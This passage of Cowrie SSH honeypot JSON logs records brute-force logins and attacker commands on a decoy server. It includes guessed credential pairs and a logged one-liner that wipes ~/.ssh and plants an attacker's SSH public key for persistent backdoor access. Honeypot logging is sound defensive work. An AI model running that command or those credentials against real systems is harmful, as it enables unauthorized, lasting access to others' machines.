tp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:44:42.810482Z","src_ip":"212.227.125.160","session":"78c13fc4e4e0"}
{"eventid":"cowrie.login.failed","username":"guest","password":"111111","message":"login attempt [guest/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T11:44:43.334466Z","src_ip":"212.227.125.160","session":"78c13fc4e4e0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:44:44.509894Z","src_ip":"212.227.125.160","session":"78c13fc4e4e0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51698,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cbead94671a","protocol":"ssh","message":"New connection: 217.72.205.35:51698 (1.2.3.4:22) [session: 8cbead94671a]","sensor":"my-vps","timestamp":"2025-08-28T11:44:53.740070Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:44:53.741305Z","src_ip":"217.72.205.35","session":"8cbead94671a"}
{"eventid":"cowrie.session.connect","src_ip":"167.172.166.36","src_port":54800,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d97d436400e","protocol":"ssh","message":"New connection: 167.172.166.36:54800 (1.2.3.4:22) [session: 1d97d436400e]","sensor":"my-vps","timestamp":"2025-08-28T11:45:13.524421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:45:13.525335Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:45:13.538500Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#123qweQWE","message":"login attempt [root/!@#123qweQWE] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:45:13.622332Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:45:13.666824Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:45:13.667659Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:45:13.668544Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:45:13.681538Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:45:14.144791Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:45:14.145549Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:45:14.159204Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:45:14.160367Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.session.connect","src_ip":"167.172.166.36","src_port":54814,"dst_ip":"1.2.3.4","dst_port":22,"session":"d45a1a516b02","protocol":"ssh","message":"New connection: 167.172.166.36:54814 (1.2.3.4:22) [session: d45a1a516b02]","sensor":"my-vps","timestamp":"2025-08-28T11:45:14.169692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:45:14.170641Z","src_ip":"167.172.166.36","session":"d45a1a516b02"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:45:14.181731Z","src_ip":"167.172.166.36","session":"d45a1a516b02"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:45:14.268267Z","src_ip":"167.172.166.36","session":"d45a1a516b02"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:45:15.282247Z","src_ip":"167.172.166.36","session":"d45a1a516b02"}
{"eventid":"cowrie.session.connect","src_ip":"167.172.166.36","src_port":46928,"dst_ip":"1.2.3.4","dst_port":22,"session":"6db078915075","protocol":"ssh","message":"New connection: 167.172.166.36:46928 (1.2.3.4:22) [session: 6db078915075]","sensor":"my-vps","timestamp":"2025-08-28T11:45:15.292597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:45:15.293521Z","src_ip":"167.172.166.36","session":"6db078915075"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:45:15.304621Z","src_ip":"167.172.166.36","session":"6db078915075"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:45:15.390194Z","src_ip":"167.172.166.36","session":"6db078915075"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:45:15.403015Z","src_ip":"167.172.166.36","session":"1d97d436400e"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:45:15.403953Z","src_ip":"167.172.166.36","session":"6db078915075"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40330,"dst_ip":"1.2.3.4","dst_port":22,"session":"9eb1424a201c","protocol":"ssh","message":"New connection: 212.227.125.160:40330 (1.2.3.4:22) [session: 9eb1424a201c]","sensor":"my-vps","timestamp":"2025-08-28T11:45:24.629362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:45:24.630767Z","src_ip":"212.227.125.160","session":"9eb1424a201c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:45:24.800802Z","src_ip":"212.227.125.160","session":"9eb1424a201c"}
{"eventid":"cowrie.login.failed","username":"guest","password":"1234567","message":"login attempt [guest/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T11:45:25.484790Z","src_ip":"212.227.125.160","session":"9eb1424a201c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:45:26.657586Z","src_ip":"212.227.125.160","session":"9eb1424a201c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39564,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed6fe5834133","protocol":"ssh","message":"New connection: 212.227.125.160:39564 (1.2.3.4:22) [session: ed6fe5834133]","sensor":"my-vps","timestamp":"2025-08-28T11:45:45.306923Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T11:45:45.307849Z","src_ip":"212.227.125.160","session":"ed6fe5834133"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:45:45.308527Z","src_ip":"212.227.125.160","session":"ed6fe5834133"}
{"eventid":"cowrie.session.connect","src_ip":"160.191.2.69","src_port":47862,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d4f7197d00e","protocol":"ssh","message":"New connection: 160.191.2.69:47862 (1.2.3.4:22) [session: 5d4f7197d00e]","sensor":"my-vps","timestamp":"2025-08-28T11:45:58.312538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:45:58.313301Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:45:58.480345Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.login.success","username":"root","password":"nt5.nomore","message":"login attempt [root/nt5.nomore] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:45:59.179561Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:45:59.526858Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:45:59.527557Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:45:59.528378Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:45:59.695767Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:00.085632Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.086476Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.252492Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.253534Z","src_ip":"160.191.2.69","session":"5d4f7197d00e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57238,"dst_ip":"1.2.3.4","dst_port":22,"session":"28ef22a06d46","protocol":"ssh","message":"New connection: 212.227.125.160:57238 (1.2.3.4:22) [session: 28ef22a06d46]","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.358570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.359628Z","src_ip":"212.227.125.160","session":"28ef22a06d46"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.382179Z","src_ip":"212.227.125.160","session":"28ef22a06d46"}
{"eventid":"cowrie.login.success","username":"root","password":"choupa","message":"login attempt [root/choupa] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.455559Z","src_ip":"212.227.125.160","session":"28ef22a06d46"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:00.523649Z","src_ip":"212.227.125.160","session":"28ef22a06d46"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.524331Z","src_ip":"212.227.125.160","session":"28ef22a06d46"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.548633Z","src_ip":"212.227.125.160","session":"28ef22a06d46"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.549717Z","src_ip":"212.227.125.160","session":"28ef22a06d46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57246,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea9971235fba","protocol":"ssh","message":"New connection: 212.227.125.160:57246 (1.2.3.4:22) [session: ea9971235fba]","sensor":"my-vps","timestamp":"2025-08-28T11:46:00.570363Z"}
